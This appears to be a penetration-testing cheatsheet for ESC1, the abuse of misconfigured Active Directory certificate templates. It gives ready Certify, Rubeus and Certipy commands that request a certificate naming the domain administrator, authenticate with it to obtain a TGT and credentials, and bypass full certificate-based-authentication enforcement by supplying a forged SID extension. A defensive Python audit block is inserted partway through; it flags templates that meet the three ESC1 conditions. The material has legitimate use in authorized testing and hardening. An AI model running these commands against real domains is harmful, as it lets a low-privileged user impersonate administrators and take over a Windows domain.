ESC1

A cheatsheet for ESC1 targeting certificate-based authentication vulnerabilities to exploit unauthorized certificate requests and achieve privilege escalation in Windows and Linux environments.


Authors: BobBuilder, otter


For this technique to work we need a certificate template with the following requirements:

  • ENROLLEE_SUPPLIES_SUBJECT attribute enabled: this allows the user who initiated the CSR (certificate signing request) to specify an arbitrary SAN (subjectAltName), which makes it possible to request a certificate as any user in the domain
  • at least one of the following EKU OIDs: Smart Card Logon / PKINIT Authentication / Client Authentication
  • a user with enrollment rights on the template
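As an added defensive example (not code from this cheatsheet or from Certify/Certipy), the check below flags templates that meet all three conditions at once. The template records are constructed inline; the attribute names follow the AD schema (msPKI-Certificate-Name-Flag, pKIExtendedKeyUsage), while the enroll list and the LOW_PRIV_PRINCIPALS set are assumptions standing in for the template's ACL.

```python
# Added example: posture check for the three ESC1 template conditions.
# Input records are constructed; real ones would be read from the
# CN=Certificate Templates container via LDAP.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag

# EKU OIDs that make an issued certificate usable for authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
}

# Assumption: enrollment granted to any of these counts as low-privileged
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers"}

# Constructed sample templates; "enroll" stands in for the principals holding
# the Certificate-Enrollment right in the template's nTSecurityDescriptor.
TEMPLATES = [
    {"name": "VulnUser", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0x82000000,  # subject built from AD
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"name": "WebServer", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Users"]},
    {"name": "AdminOnly", "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.2"], "enroll": ["Domain Admins"]},
]


def esc1_findings(template):
    """Return the ESC1 conditions a template satisfies (all three => ESC1)."""
    findings = []
    if template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("enrollee supplies subject")
    ekus = [AUTH_EKUS[o] for o in template["pKIExtendedKeyUsage"] if o in AUTH_EKUS]
    if ekus:
        findings.append("auth EKU: " + ", ".join(ekus))
    low = sorted(set(template["enroll"]) & LOW_PRIV_PRINCIPALS)
    if low:
        findings.append("low-priv enroll: " + ", ".join(low))
    return findings


def is_esc1(template):
    return len(esc1_findings(template)) == 3


def audit(templates):
    """Names of templates that satisfy all three ESC1 conditions."""
    return [t["name"] for t in templates if is_esc1(t)]


if __name__ == "__main__":
    for t in TEMPLATES:
        print(t["name"], "->", "ESC1" if is_esc1(t) else "ok", esc1_findings(t))
```

A template missing any one condition (subject taken from AD, no authentication EKU, or enrollment limited to privileged groups) is reported with only the conditions it does meet, which is what to fix first.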

Windows

Certificate Request with alternative SAN

.\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator@minions.com

Convert the certificate from PEM to PFX

Certificate Authentication

.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

Linux

Certificate Request with alternative SAN

certipy req -u user1@minions.com -p "pass1" -ca <ca_name> -template <template_name> -upn administrator@minions.com -dc-ip 10.10.10.10
certipy req -u user1@minions.com -p 'pass1' -ca <ca_name> -template <template_name> -upn Administrator -dc-ip <ip>

Note: if you get the error "The NETBIOS connection with the remote host timed out", just try again.

Certificate Authentication

certipy auth -pfx administrator.pfx -dc-ip <ip>

ESC1 in CBA-Patched Environments

When working in an environment in which the CBA (Certificate-based Authentication) patch is set to Full Enforcement, whenever a user requests a certificate for an alternate user, the SID of the requesting user is compared with the SID embedded in the certificate's szOID_NTDS_CA_SECURITY_EXT extension: if they do not match, this technique cannot be performed. So in a fully patched environment, the normal

.\Rubeus.exe asktgt /user:administrator /domain:minions.com /certificate:'C:\Temp\esc1.pfx' /password:'SomethingSecure123!' /dc:dc.minions.com /nowrap /ptt

would not work.

To work around this policy we can use Certify's built-in sidextension argument (present in Certipy as well under extensionsid):

.\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com

You can see more about how the extension works and its uses here.